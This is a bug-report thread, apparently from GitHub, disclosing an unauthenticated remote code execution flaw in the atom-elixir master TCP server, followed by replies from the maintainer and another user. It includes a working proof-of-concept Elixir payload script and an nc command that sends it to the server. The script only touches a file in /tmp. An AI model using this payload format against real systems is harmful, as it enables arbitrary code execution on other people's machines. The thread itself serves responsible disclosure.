Unauthenticated remote code execution from any host

[ivan]

atom-elixir@master starts a TCP server that listens on all interfaces and evals code without authenticating the user. Anyone on the network can use this to execute arbitrary code with the privileges of the user running atom-elixir. (Note: I believe the atom-elixir 0.2.2 release version is unaffected; I didn't see a TCP server there.)

make_payload.exs:

# This can, of course, be far worse.
exploit = ~s{File.touch!("/tmp/atom-elixir-rce")}

payload = %{"buffer" => "", "module" => exploit, "function" => "", "line" => ""}
data    = %{"request" => "definition", "payload" => payload}
bterm   = :erlang.term_to_binary(data)
length  = bterm |> byte_size
:ok     = IO.write(<<101, length :: size(32), bterm :: bitstring>>)

Make sure atom-elixir@master is running in Atom (atom --foreground), take note of the port, and run:

elixir make_payload.exs | nc 127.0.0.1 PORT

and observe /tmp/atom-elixir-rce get created on the target machine (which, as mentioned, does not need to be localhost).

I filed a similar bug on alchemist-server at tonini/alchemist-server#14 and the comments there apply here too, especially: listening only on 127.0.0.1 does not fully resolve the issue because of potential attacks from other users or through the browser.

[msaraiva]

@ivan thanks for reporting this issue. I'll take a look at it as soon I finish the new API.

Note: I believe the atom-elixir 0.2.2 release version is unaffected; I didn't see a TCP server there.

Yes. TCPServer is still in development and has not been published yet.

[mveytsman]

@msaraiva I want to bring this to your attention tonini/alchemist-server#14 (comment)

This issue is exploitable from any website via javascript.